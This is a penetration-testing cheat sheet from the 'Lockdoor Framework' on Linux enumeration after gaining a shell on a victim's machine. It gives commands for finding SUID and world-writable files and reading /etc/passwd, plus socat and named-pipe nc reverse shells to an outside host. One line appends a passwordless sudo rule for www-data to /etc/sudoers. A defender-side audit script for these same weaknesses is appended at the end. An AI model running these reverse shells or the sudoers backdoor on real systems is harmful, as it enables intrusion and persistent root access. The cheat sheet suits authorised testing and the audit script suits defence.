Lockdoor Framework

A Penetration Testing Framework


Linux Enumeration

Things to do after getting a shell on the victim’s machine

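- Find World Writable Directories

```ShellSession
find / -xdev -type d -perm -0002 -ls 2> /dev/null
```

- Find World Writable Files

```ShellSession
find / -xdev -type f -perm -0002 -ls 2> /dev/null
```

```ShellSession
# SUID files owned by root
find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
# Distribution and release
cat /etc/*-release
# TCP/UDP sockets with their owning processes
netstat -antup
# sudo rules for the current user
sudo -l
# Kernel version and architecture
uname -a
# System cron configuration
cat /etc/cron*
# Network interfaces and addresses
ip addr
# Local accounts
cat /etc/passwd
```

```ShellSession
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```

- Connect

```ShellSession
socat file:`tty`,raw,echo=0 tcp-listen:4444
```

```ShellSession
# Shell over a named pipe and nc
mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc <ip> <port> 1> /tmp/backpipe; rm /tmp/backpipe
# Installed version of a package (Debian/Ubuntu)
dpkg -l <application name>
# Appends a passwordless sudo rule for www-data and sets the file mode to 440
echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers
```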
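The same conditions can be checked from the defender's side before anyone else enumerates them. The script below is an added example, not part of the Lockdoor cheat sheet; the function names (`world_writable`, `suid_files`, `nopasswd_rules`, `bad_sudoers_mode`, `audit`) are hypothetical, and the scan root and sudoers path are passed as arguments.

```shell
#!/bin/sh
# Added example (function names are hypothetical): defender-side audit for the
# conditions the commands above look for. Scan roots and files are parameters.

# World-writable files, and world-writable directories without the sticky bit
# (sticky directories such as /tmp are world-writable by design).
world_writable() {
    find "$1" -xdev \( \( -type f -perm -0002 \) -o \
        \( -type d -perm -0002 ! -perm -1000 \) \) -print 2>/dev/null
}

# Set-UID regular files under $1 owned by user $2 (default: root).
suid_files() {
    find "$1" -xdev -type f -perm -4000 -user "${2:-root}" -print 2>/dev/null
}

# Active (non-comment) sudoers lines that grant NOPASSWD.
nopasswd_rules() {
    grep -E '^[[:space:]]*[^#[:space:]].*NOPASSWD:' "$1" 2>/dev/null
}

# Prints the path if the file's mode is anything other than 0440.
bad_sudoers_mode() {
    find "$1" -prune ! -perm 0440 -print 2>/dev/null
}

# audit DIR SUDOERS_FILE [OWNER]: print labelled findings, return 1 if any.
audit() {
    findings=$( {
        world_writable "$1"   | sed 's/^/WORLD-WRITABLE /'
        suid_files "$1" "$3"  | sed 's/^/SUID /'
        nopasswd_rules "$2"   | sed 's/^/NOPASSWD /'
        bad_sudoers_mode "$2" | sed 's/^/SUDOERS-MODE /'
    } )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# Example: sh audit.sh / /etc/sudoers
if [ "$#" -ge 2 ]; then audit "$@"; fi
```

Run it as root so `find` can read every directory; a non-zero exit status means at least one finding was printed.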